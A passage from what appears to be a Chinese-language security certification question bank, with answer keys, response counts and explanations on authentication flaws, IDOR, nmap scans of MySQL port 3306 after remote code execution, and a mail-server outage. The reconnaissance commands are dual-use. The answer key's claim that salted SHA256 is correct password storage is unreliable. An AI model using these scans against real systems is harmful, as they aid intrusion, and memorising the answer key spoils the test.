(A) 密碼輸入不經雜湊儲存於資料庫
(B) 可以修改自己的帳號讀取到其他人帳號參數
(C) 使用 Base64 加 SHA256 加鹽雜湊儲存密碼
(D) 以 GET 方法將帳號與密碼置於 URL 參數

> **答案：A, B, D**
> 統計：A(42), B(57), C(16), D(55)
>
> 解析：A 密碼明文儲存是 Broken Authentication；B 修改帳號參數讀取他人資料是 Broken Access Control（IDOR）；D 帳密放在 URL 參數用 GET 傳送會被瀏覽器歷史、伺服器日誌記錄，屬於 Broken Authentication。C 使用 Base64+SHA256+加鹽雜湊是正確的密碼儲存方式，不是問題。16 人選 C 是把「Base64」看成弱點，但這裡 Base64 只是編碼輔助，核心是 SHA256 加鹽雜湊。

### 非常困難

**8.（複選）【題組 1】情境如附圖所示。攻擊者取得 RCE 後，使用下列哪些 nmap 指令（指令中的 target 請視為要掃描的系統）可以用來掃描 3306 埠，並且可以顯示資料庫服務的版本？**
(A) nmap -sV -p 3306 target
(B) nmap -O -p 1-65535 target
(C) nmap -sS -T5 target
(D) nmap -sV -p 3306 --script mysql-info target

> **答案：A, D**
> 統計：A(46), B(18), C(12), D(48)
>
> 解析：題目要同時滿足兩個條件：「掃描 3306 埠」＋「顯示資料庫服務版本」。A `-sV` 做服務版本偵測、`-p 3306` 指定埠號，兩個條件都滿足。D 同樣有 `-sV -p 3306` 且加上 `--script mysql-info` 取得更詳細的 MySQL 資訊，也滿足。B `-O` 是 OS 偵測不是服務版本偵測；C `-sS -T5` 是快速 SYN 掃描但沒有 `-sV` 無法顯示版本，且未指定 3306 埠。

**21.（複選）H 公司於上周發生公司 email 超過 4 個小時以上無法收發的資安事件，經 MIS 人員處理後發現，郵件伺服器因硬碟空間不足而無法正常運作，並由追蹤相關記錄中找出服務中斷前，系統正在處理一封寄給全公司 2000 位同仁的內部公告郵件，其之中被夾帶著 4GB 的附檔，但此附檔在防毒軟體和沙箱工具檢查後並無病毒或威脅性，刪除此郵件及相關衍生作業後，郵件伺服器恢復正常運作，檢討此次內部資安攻擊事件，確認為人員操作失誤所致。請問下列何項措施「無法」防範此類事件再度發生？**
(A) 儘快增購郵件伺服器的硬碟容量，避免再發生相同空間不足的問題再度發生
(B) 對員工加強資安教育訓練，避免錯誤的資訊系統操作行為
(C) 增加防火牆檢查細則，減少大量或敏感資料的傳輸與攻擊事件
(D) 郵件伺服器增設郵件處理容量限制，阻絕大檔案的傳送服務

> **答案：A, C，原本答案C**
> 統計：A(38), B(11), C(35), D(14)
>
> 解析：A 增購硬碟只是擴大容量但沒有限制大附件行為，治標不治本——下次再有人寄更大的附件照樣爆掉。C 防火牆管的是進出網路邊界的流量，這封郵件是內部公告（內部→內部），通常不經過防火牆，防火牆規則對內部郵件無效。B 教育訓練能防人員操作失誤（直接對因）；D 郵件處理容量限制能直接阻止大附件寄送（技術控制）。35 人選 C 是正確的，但 38 人也選了 A，這題考的是「增購硬碟能不能防止同類事件」——答案認為不能，因為根本原因是大附件行為未被限制。